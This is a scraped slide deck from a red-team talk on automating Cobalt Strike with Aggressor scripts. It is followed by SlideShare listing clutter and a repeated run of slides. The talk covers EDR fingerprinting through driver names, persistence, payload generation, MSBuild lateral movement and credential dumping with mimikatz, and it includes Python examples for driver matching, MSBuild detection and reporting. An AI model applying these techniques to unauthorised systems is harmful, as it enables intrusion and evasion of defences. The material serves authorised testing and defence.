Aggressive Autonomous Actions – Operating with Automation
@ChrisTruncer & @r3dQu1nn
#whoami
@ChrisTruncer
▸ Sys admin turned red teamer
▸ Florida State Seminole
▸ Co-Founder and Red Team Lead of FortyNorth Security
▸ Open Source Developer
▹ Veil-Framework
▹ WMImplant
▹ EyeWitness
▹ ...and more
#whoami
@r3dQu1nn
▸ Sys/Net Admin turned Red Teamer/Pen Tester
▸ Previous:
▹ IT in the Navy for 9 years
▹ Navy Red Team Technical Lead
▸ Current:
▹ Red Team Security Consultant for Mandiant
▹ PowerShell Reverse Engineer
▸ Glorified Script Kiddie/Noobie
▹ https://github.com/harleyQu1nn/AggressorScripts
What’s This Talk About?
▸ Automation
▸ Aggressor
▹ Event driven language
▸ Events that we might care about
▸ Assessment/Attack lifecycle
▸ Where can automation help?
▸ Demos
▸ Links
This is NOT About…
▸ Automating Red Teams
▸ Automating Pen Testing
▸ There’s something to be said about the human mind analyzing the problem
▹ What if an exploit fails once, but runs the second time?
▹ How does automation account for this?
▹ Can it always identify the root cause?
▸ This isn’t SKYNET for offensive work
Automation – What’s our expectation of it?
Automation
▸ Automation is useful for tasks
▹ Tasks that don’t require interaction
▹ Doesn’t need human processing
▸ At some level, we’re lazy
▹ Why manually do something if we can automate it?
▸ Trivial tasks are prime candidates
▹ Don’t require intensive analysis, if any
▸ How long will you have that initial access?
▹ Do you have the right permissions to install persistence?
▹ Can you install persistence fast enough before the victim user logs off?
▹ Automation can help us accomplish these much faster
Automation
▸ There are additional benefits beyond letting us sit and watch something do our job
▸ Ensure a uniform process is always followed
▹ You can build out protection mechanisms that keep you from doing something you shouldn’t
▸ Prevent user error
▹ Rather than fat fingering a parameter/command, automation can ensure you always run it correctly
Automation
▸ How can red teams or pen testers use automation on their tests?
▹ Talk is cheap – what’s an easy way to implement?
▸ Open Source
▹ Metasploit resource scripts are a good option
▸ How do we do it?
▹ We’re a Cobalt Strike shop
▹ Scripts and code we reference/release will use Aggressor
Aggressor – What is it?
▸ Aggressor is a scripting language built into Cobalt Strike
▹ Since version 3.0
▸ It is based on the language Sleep
▸ Aggressor lets you automate operator actions, manipulate data, generate reports, etc.
▸ Aggressor isn’t a standard programming language
▹ It’s an event driven language
Event Driven Language
▸ This doesn’t generate a compiled binary which you run on a computer
▸ Rather than “starting” a program, your code is triggered when a specific event is encountered
▹ Think similar to WMI events that occur after X happens
▹ Remember IRC bots?
▸ Aggressor is driven by events that happen while it is running
▹ These are clearly related to actions that occur while compromising a system
Aggressor – The Core
▸ Aggressor is based on the language Sleep
▹ http://sleep.dashnine.org/manual/index.html
▸ Sleep is a “java-based scripting language heavily inspired by Perl”
▸ Aggressor is an additional set of exposed functions for extending Cobalt Strike and its associated functionality
▹ Extending can also mean creating automation for your requirements
https://www.amazon.com/gp/product/143822723X?ie=UTF8&tag=slejavscrlan-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=143822723X
Aggressor – The Core
▸ Aggressor has the ability to interact with Cobalt Strike, Beacons, and data, such as:
▹ Running commands within a Beacon, interpreting results, and making a decision
▹ Interacting with downloaded screenshots or keylogged data
▹ Modifying sites hosted by Cobalt Strike
▹ Interacting with credentials stored on your team server
▹ Developing custom reports for your customers, and more…
Aggressor Scripting – How can you interact with Aggressor?
Aggressor Scripting
▸ Aggressor scripting utilizes different functionality to enable its developers
▸ Events – Aggressor events initiate and run your code when a specific condition occurs
▸ Functions – Allow you to run “checks”, perform an action locally, or run a command within Beacon; this is the mechanism for performing an action
▸ Hooks – Can allow you to generate pop-up menus
▸ The Data Model – These are different data repositories that you can manipulate
Aggressor Events
▸ There are triggerable events for almost everything you could wish with Aggressor
▸ beacon_initial – This monitors for new beacons checking in to your team server
▸ event_join – This event occurs when a new user connects to your team server
▸ heartbeat_* – This event occurs every X seconds or minutes
▸ ssh_initial – As new ssh connections check in, this event will fire
Aggressor Events
▸ Remember how your DNS beacons first check in, but with no data?
▸ beacon_initial_empty – This event triggers when the team server receives an empty beacon
▸ One of the first things people may do is type “checkin” and/or set the “mode”
▹ Save yourself the step!
Aggressor Events
▸ Events expose access to different objects depending on the event
▹ beacon_initial – This will provide a handle into the individual beacon checking in
▹ This is how you can have an individual beacon perform an action
▹ heartbeat_* – exposes nothing, but you can use a function to iterate over all beacons
▹ This provides you access to them
Aggressor Events
▸ There are a large number of events that you can use to trigger your code
▸ Events are available here – https://www.cobaltstrike.com/aggressor-script/events.html
▸ You can’t create your own custom events
▹ This part isn’t user-expandable
▸ However, you can always ask if you can think of a useful trigger
Aggressor Functions
▸ Functions are the “code” associated with your Aggressor Script
▸ Functions dictate the actions that you will perform once your trigger is activated
▸ Your code isn’t limited to what you see listed on the Aggressor function page
▸ Aggressor is based on Sleep, right?
▸ Your code will likely be a combination of Aggressor and Sleep
Aggressor Functions
▸ Functions include essentially every action that you can conduct within Beacon
▹ bpowershell_import – Imports a PowerShell script within a beacon
▹ bps – Performs a process listing on the targeted beacon
▹ blogonpasswords – Runs the mimikatz logonpasswords command
▹ bls – Lists all files in a specific directory
▹ bsetenv – Sets an environment variable on the current beacon
Aggressor Functions
▸ It also includes “metafunctions” which interact with and provide results based on Beacon metadata
▹ -is64 – This function will return true if the Beacon is running in an x64 process
▹ -isadmin – This returns true if the Beacon is running with admin rights
▹ -isssh – This returns true if the active session is an SSH session
Aggressor Functions
▸ You also have the ability to interact with Cobalt Strike (rather than Beacon) and manipulate data through Aggressor
▹ gzip – Gzip a string
▹ base64_decode – Base64 decode a string
▹ openFileBrowser – Opens the file browser interface for a beacon
▹ openScreenshotBrowser – Opens the screenshot tab
▹ str_encode – Encodes a string in the specified encoding format
Aggressor Sample
▸ Let’s piece some of this together in a sample scenario
▸ You’ve compromised a Windows jump-box used by admins/users
▸ You were able to escalate privileges
▸ You’re interested in capturing passwords from users regularly logging in to the system
▸ How can Aggressor help?
Applied Automation – A Phishing Tale
What steps can leverage automation?
A Phishing Tale
▸ What’s likely the most prevalent method of gaining access into an environment?
▸ Phishing!
▸ This is a time intensive process
▹ Generally requires developing a scenario for your customer
▹ Writing custom malware for your customer and scenario
▹ Developing domain reputation
▹ Etc.
A Phishing Tale
▸ Eventually, you’ve fired your first salvo and have started phishing
▸ If you’re lucky, your first target opens your e-mail and runs your malware
▸ However, this isn’t always the case
▹ It might take a few people
▹ If you’re sending every 15-30 minutes, time adds up
▸ What if you go grab a drink, are watching a different screen, etc.?
▹ Do you see your incoming Beacon?
A Phishing Tale
▸ One of the worst feelings can be coming back to your system and seeing you missed a callback
▸ It’s also great to know right when your Beacon arrives
▸ Aggressor can help
▹ Let’s look into the correct trigger
▹ There’s publicly available code that sends text messages via e-mail
▹ Sleep can let us run an existing script
Applied Automation – Endpoint Protection
What steps can leverage automation?
Identifying EDR
▸ Now that we’ve been alerted to our beacon, we might want to recon it
▸ What sort of data are we interested in?
▹ Sky’s the limit
▹ Network Connections/Interfaces
▹ Mapped Drives
▹ Local Admin Rights
▹ Etc.
▸ What about endpoint protection software/defenses and their settings?
Identifying EDR
▸ Most EDR products install minifilter drivers/.sys files
▸ Installed to %SystemRoot%\System32\drivers or %SystemRoot%\System32\DriverStore\FileRepository
▹ Minifilter altitudes are allocated by Microsoft and are publicly listed
▹ https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes
▹ This document associates minifilter drivers with vendor names
Identifying EDR
▸ Why is this important and how can we use this?
▹ If the EDR product is not using the cloud based option we can identify the minifilter driver and match it to the company name
▹ This process can be automated using Aggressor
▹ Gives Red Teamers awareness of what they are up against before executing commands
▸ How can this be automated?
▹ Cobalt Strike's Beacon has a built-in 'ls' command we can use
▹ This built-in 'ls' command uses Win32 APIs to list a directory (more stealthy than using dir or powershell)
Identifying EDR
▸ Does the built-in 'ls' command have documentation?
▹ https://www.cobaltstrike.com/aggressor-script/functions.html#bls
Identifying EDR
▸ List out the driver directories and parse the results with conditional statements to determine what EDR is present
▹ Define a static array of .sys files
▹ Store the 'ls' command results in an array
▹ Parse the results array and do exact matching to determine the proper vendor information
▹ Profit
▸ We can also identify other AV products and Admin Tools present using the 'ps' built-in beacon command and matching on the process name
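The driver-matching routine the slide describes, as an added Python example (not the talk's Aggressor script): it parses a constructed 'ls'-style listing, does exact case-insensitive matching of .sys names against a small vendor table, and reports drivers that match nothing. The listing, the placeholder vendors and the baseline set are constructed; only WdFilter.sys is a real product driver.

```python
from dataclasses import dataclass, field

# Constructed lookup table: lower-case driver file name -> vendor.
# WdFilter.sys really is Microsoft Defender's filter driver; the other
# two entries are placeholders standing in for a table you would build
# from Microsoft's allocated-altitudes page and vendor documentation.
VENDOR_BY_DRIVER = {
    "wdfilter.sys": "Microsoft Defender",
    "examplevendor_flt.sys": "ExampleVendor EDR (placeholder)",
    "placeholderav.sys": "PlaceholderAV (placeholder)",
}

# Drivers that ship with Windows and are expected everywhere, so they are
# not reported as "unknown". Constructed subset for the example.
BASELINE_DRIVERS = {"fltmgr.sys", "ntfs.sys", "tcpip.sys"}

# Constructed listing in the shape of a Beacon 'ls' result: header, separator,
# then one entry per line with the file name as the last column.
SAMPLE_LISTING = """\
Size     Type    Last Modified         Name
----     ----    -------------         ----
         dir     01/01/2020 00:00:00   .
 382kb   fil     01/01/2020 00:00:00   WdFilter.sys
 412kb   fil     01/01/2020 00:00:00   fltmgr.sys
  88kb   fil     01/01/2020 00:00:00   examplevendor_flt.sys
  40kb   fil     01/01/2020 00:00:00   unseen_driver.sys
"""


@dataclass
class DriverInventory:
    vendors: dict = field(default_factory=dict)  # vendor -> [file names]
    unknown: list = field(default_factory=list)  # .sys files with no match


def parse_listing(listing: str) -> list:
    """Return the file-name column of a whitespace-separated listing.

    Only the last token of each non-blank line is kept, so size/type/date
    columns and header lines do not matter; non-.sys names are filtered
    out later.
    """
    return [line.split()[-1] for line in listing.splitlines() if line.strip()]


def inventory_minifilters(names, table=VENDOR_BY_DRIVER) -> DriverInventory:
    """Exact, case-insensitive match of each .sys name against the table."""
    inv = DriverInventory()
    for name in names:
        key = name.lower()
        if not key.endswith(".sys"):
            continue
        if key in table:
            inv.vendors.setdefault(table[key], []).append(name)
        elif key not in BASELINE_DRIVERS:
            inv.unknown.append(name)  # worth a look: not baseline, not known
    return inv


def missing_expected(inv: DriverInventory, expected_vendor: str) -> bool:
    """Defender-side check: is the product we deployed actually on this host?"""
    return expected_vendor not in inv.vendors


def summarize(inv: DriverInventory) -> list:
    """One line per identified vendor, then one per unknown driver."""
    lines = [f"{vendor}: {', '.join(files)}" for vendor, files in sorted(inv.vendors.items())]
    lines += [f"unknown driver: {name}" for name in inv.unknown]
    return lines


if __name__ == "__main__":
    inventory = inventory_minifilters(parse_listing(SAMPLE_LISTING))
    print("\n".join(summarize(inventory)))
    print("expected EDR missing:", missing_expected(inventory, "Microsoft Defender"))
```

A defender can run the same matching over a host inventory to confirm the expected minifilter is present on every host and to surface drivers nobody can account for.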
Applied Automation – Persistence
What steps can leverage automation?
Persisting
▸ We’ve found minimal EDR software, or exclusions which we can exploit to maintain access
▸ Persistence might be the next step we want to take (depending on previous results)
▸ Automating persistence is something we hesitate on doing
▸ Let’s have this be a combination of manual analysis and Aggressor
Persisting
▸ There are a couple of different ways to persist depending on the level of access
▹ Registry Key
▹ Scheduled Task
▹ WMI Persistence
▸ Rather than doing this all from the command line, let’s generate a pop-up for ease of use!
Applied Automation – Generating Payloads
What steps can leverage automation?
Generating Payloads
▸ Payload generation is another crucial step in Red Team engagements and is used for many different reasons
▹ Initial Access
▹ Lateral Movement
▹ Persistence
▹ Obfuscation/Encoding/AWL Bypass
▸ Beneficial for Blue Team as well!
▹ Signature based identifiers/IOCs
▹ Test detection capabilities
▹ Payload sizes/types
Generating Payloads
▸ What types of payloads can we generate?
▹ HTTP
▹ HTTPS
▹ SMB
▹ DNS
▸ How do they work and how are they generated?
▹ Staged vs Stageless (S)
▹ Based off listener information, malleable profile, architecture selection (x64/x86)
▹ Attacks -> Packages menu options
Generating Payloads
▸ How can we automate payload generation using Aggressor?
▹ Utilize the dialog API with drow_listener
▹ artifact/artifact_stageless functions
▹ https://www.cobaltstrike.com/aggressor-script/functions.html#dialog
▹ https://www.cobaltstrike.com/aggressor-script/functions.html#drow_listener
▹ https://www.cobaltstrike.com/aggressor-script/functions.html#artifact
▹ https://www.cobaltstrike.com/aggressor-script/functions.html#artifact_stageless
Applied Automation – Lateral Movement
What steps can leverage automation?
Lateral Movement
▸ Lateral movement is a vital part of every engagement and can be approached in different ways
▹ What value can we add if we show successful pivoting inside a network?
▹ 9 times out of 10 we need to move laterally to accomplish our objectives
▸ Can we automate this methodology?
▹ How can we use Aggressor Scripts to enhance lateral movement?
Lateral Movement
▸ Built-in methods of lateral movement inside of beacon
▹ wmi
▹ psexec/psexec_psh
▹ winrm
▸ All of these methods invoke a PowerShell one-liner based on the listener selection
▹ Good for quick and easy lateral movement
▹ Bad for staying stealthy and avoiding the use of PowerShell/PsExec
Lateral Movement
▸ Let's use Aggressor to build out a newer technique of Lateral Movement
▸ Focus on using unmanaged PowerShell with msbuild
▸ Set global variables to help generate the XML file
▸ Functions that we need to utilize:
▹ alias
▹ beacon_command_register
▹ bupload_raw
▹ bpowerpick
▹ exec
Lateral Movement
▸ Building out our alias commands with beacon_command_register
▹ remote_msbuild_script
▹ remote_msbuild_cmd
Lateral Movement
▸ Let's run through the other alias command (remote_msbuild_cmd) and use similar code with minor differences
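From the defender's side, the MSBuild-as-script-host technique these slides build out (an MSBuild project file pushed to a remote host and executed through WMI, a service or WinRM) leaves a recognisable process-creation pattern; this added Python example, not code from the talk, flags it in constructed process records. The records, the expected-parent list, the remote-execution host list and the path heuristics are assumptions loosely modelled on Sysmon process-creation fields, to be tuned to your own build environment.

```python
import ntpath
import re

# Parents from which MSBuild legitimately runs in this constructed example
# (IDE and build-tool processes). Assumption: tune to your own estate.
EXPECTED_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}

# Parent processes that host remote execution: the WMI provider host, the
# service control manager that starts PsExec-style services, and WinRM.
REMOTE_EXEC_HOSTS = {"wmiprvse.exe", "services.exe", "wsmprovhost.exe"}

# Project-file locations a build should not normally read from: temp and
# user-writable paths, or a path reached through an admin share.
SUSPECT_PATH = re.compile(
    r"(\\temp\\|\\appdata\\|\\programdata\\|\\users\\public\\|^\\\\[^\\]+\\(admin|c)\$\\)",
    re.IGNORECASE,
)

# The project file is the argument ending in an MSBuild project extension.
PROJECT_ARG = re.compile(
    r'("[^"]+\.(?:xml|csproj|proj)"|\S+\.(?:xml|csproj|proj))', re.IGNORECASE
)

# Constructed process-creation records in the spirit of Sysmon event 1
# (Image / ParentImage / CommandLine). Not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "CommandLine": r'MSBuild.exe "C:\src\app\app.csproj" /t:Build'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"msbuild.exe C:\Windows\Temp\update.xml"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]


def project_file(command_line: str):
    """Extract the project-file argument, or None if there is none."""
    m = PROJECT_ARG.search(command_line)
    return m.group(1).strip('"') if m else None


def score_event(ev: dict) -> list:
    """Return the reasons an MSBuild launch looks suspicious (empty = benign)."""
    image = ntpath.basename(ev.get("Image", "")).lower()
    if image != "msbuild.exe":
        return []
    reasons = []
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent: {parent or '<none>'}")
    if parent in REMOTE_EXEC_HOSTS:
        reasons.append("launched through a remote-execution host")
    proj = project_file(ev.get("CommandLine", ""))
    if proj is not None and SUSPECT_PATH.search(proj):
        reasons.append(f"project file in a suspect location: {proj}")
    return reasons


def detect(events) -> list:
    """Return (index, reasons) for every event that scores at least one reason."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(why)}")
```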
Applied Automation – Report Generation
What steps can leverage automation?
Reporting
▸ Reporting is part of every assessment and it should be done right
▹ What value are we if we can hack our customers but can’t convey what we did, risk remediations, etc.?
▸ There are steps you can take to make reporting more efficient
▹ Develop approved finding language
▹ Develop reporting templates
▹ Automate generating commonly requested information
Reporting
▸ Let’s tackle that last bullet point
▹ Automate generating commonly requested information
▸ What’s something that our customers ALWAYS ask?
▹ What computers were compromised?
▹ What accounts were compromised?
▸ Let’s create a report generating function which captures this information!
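The report function the slide asks for, as an added Python example rather than the talk's Aggressor code: it folds constructed records shaped like Cobalt Strike's beacons() and credentials() data-model entries into the two lists customers ask for, merging FQDN and short-name forms of a host and repeated credential sightings. The key names, and the trailing "*" marking an elevated session, are assumptions from memory of the Beacon listing; the records themselves are constructed.

```python
from collections import defaultdict

# Constructed records shaped like Cobalt Strike's beacons() entries.
# Assumption: an elevated session carries a trailing " *" on the user name,
# as the Beacon listing shows it.
SAMPLE_BEACONS = [
    {"id": "1", "computer": "WKSTN01", "user": "jdoe", "pid": "4120"},
    {"id": "2", "computer": "wkstn01.corp.local", "user": "jdoe *", "pid": "5000"},
    {"id": "3", "computer": "JUMPBOX", "user": "SYSTEM *", "pid": "812"},
]

# Constructed records shaped like credentials() entries; no real secrets.
SAMPLE_CREDS = [
    {"user": "jdoe", "realm": "corp", "host": "WKSTN01", "source": "logonpasswords"},
    {"user": "svc_backup", "realm": "CORP", "host": "JUMPBOX", "source": "logonpasswords"},
    {"user": "svc_backup", "realm": "CORP", "host": "wkstn01", "source": "hashdump"},
]


def normalize_host(name: str) -> str:
    """Fold mixed-case and FQDN forms of the same host into one key."""
    return name.strip().split(".")[0].upper()


def compromised_computers(beacons) -> dict:
    """host -> {user: elevated}; the flag is true if any session was elevated."""
    hosts = defaultdict(dict)
    for b in beacons:
        raw = b.get("user", "")
        user, elevated = raw.rstrip("*").strip(), raw.endswith("*")
        host = normalize_host(b["computer"])
        hosts[host][user] = hosts[host].get(user, False) or elevated
    return dict(hosts)


def compromised_accounts(creds) -> dict:
    """REALM\\user -> set of hosts the credential was recovered from."""
    accounts = defaultdict(set)
    for c in creds:
        key = f"{c.get('realm', '').upper()}\\{c['user']}"
        accounts[key].add(normalize_host(c.get("host", "")))
    return dict(accounts)


def render(beacons, creds) -> str:
    """Plain-text answer to 'what computers and accounts were compromised?'."""
    comps = compromised_computers(beacons)
    accts = compromised_accounts(creds)
    lines = [f"Compromised computers ({len(comps)})"]
    for host in sorted(comps):
        users = ", ".join(
            u + (" (elevated)" if comps[host][u] else "") for u in sorted(comps[host])
        )
        lines.append(f"  {host}: {users}")
    lines.append(f"Compromised accounts ({len(accts)})")
    for acct in sorted(accts):
        lines.append(f"  {acct}: recovered on {', '.join(sorted(accts[acct]))}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(SAMPLE_BEACONS, SAMPLE_CREDS))
```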
Where to get this?
▸ We just covered a lot of different code
▸ Aggregate everything within a central repo
▹ This is not all our code
▹ It’s some of the scripts we use the most in one area
▸ https://github.com/FortyNorthSecurity/AggressorAssessor
▹ Get all of the code here!
@ChrisTruncer
▹ https://www.fortynorthsecurity.com
@r3dQu1nn
▹ https://github.com/harleyQu1nn/AggressorScripts
Thanks!

Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 

Recently uploaded (20)

Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 

Aggressive Autonomous Actions - Operating with Automation

▹ Rather than fat fingering a parameter/command, automation can ensure you always run it correctly
8
Automation
▸ How can red teams or pen testers use automation on their tests?
▹ Talk is cheap – what’s an easy way to implement it?
▸ Open source
▹ Metasploit resource scripts are a good option
▸ How do we do it?
▹ We’re a Cobalt Strike shop
▹ Scripts and code we reference/release will use Aggressor
9
https://www.cobaltstrike.com/images/art/hacker_small.png
Aggressor – What is it?
▸ Aggressor is a scripting language built into Cobalt Strike
▹ Since version 3.0
▸ It is based on the language Sleep
▸ Aggressor lets you automate operator actions, manipulate data, generate reports, etc.
▸ Aggressor isn’t a standard programming language
▹ It’s an event driven language
11
https://memegenerator.net/instance/52901150/buzz-lightyear-meme-fixd-scripts-scripts-everywhere
Event Driven Language
▸ This doesn’t generate a compiled binary which you run on a computer
▸ Rather than “starting” a program, your code is triggered when a specific event is encountered
▹ Think similar to WMI events that fire after X happens
▹ Remember IRC bots?
▸ Aggressor is driven by events that happen while it is running
▹ These are closely related to actions that occur while compromising a system
12
Aggressor – The Core
▸ Aggressor is based on the language Sleep
▹ http://sleep.dashnine.org/manual/index.html
▸ Sleep is a “Java-based scripting language heavily inspired by Perl”
▸ Aggressor is an additional set of exposed functions for extending Cobalt Strike and its associated functionality
▹ Extending can also mean creating automation for your requirements
13
https://www.amazon.com/gp/product/143822723X?ie=UTF8&tag=slejavscrlan-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=143822723X
Aggressor – The Core
▸ Aggressor has the ability to interact with Cobalt Strike, Beacons, and data, for example:
▹ Running commands within a Beacon, interpreting results, and making a decision
▹ Interacting with downloaded screenshots or keylogged data
▹ Modifying sites hosted by Cobalt Strike
▹ Interacting with credentials stored on your team server
▹ Developing custom reports for your customers, and more…
14
Aggressor Scripting
▸ Aggressor scripting exposes several kinds of functionality to script developers
▸ Events – an Aggressor event initiates and runs your code when a specific condition occurs
▸ Functions – allow you to run “checks”, perform an action locally, or run a command within Beacon; this is the mechanism for performing an action
▸ Hooks – let you generate pop-up menus
▸ The Data Model – the different data repositories (beacons, credentials, targets, etc.) that you can query and manipulate
16
Aggressor Events
▸ There are triggerable events for almost everything you could wish for with Aggressor
▸ beacon_initial – fires when a new Beacon checks in to your team server
▸ event_join – fires when a new user connects to your team server
▸ heartbeat_* – fires every X seconds or minutes (heartbeat_1s, heartbeat_1m, etc.)
▸ ssh_initial – fires as new SSH sessions check in
17
Aggressor Events
▸ Remember how your DNS Beacons first check in, but with no data?
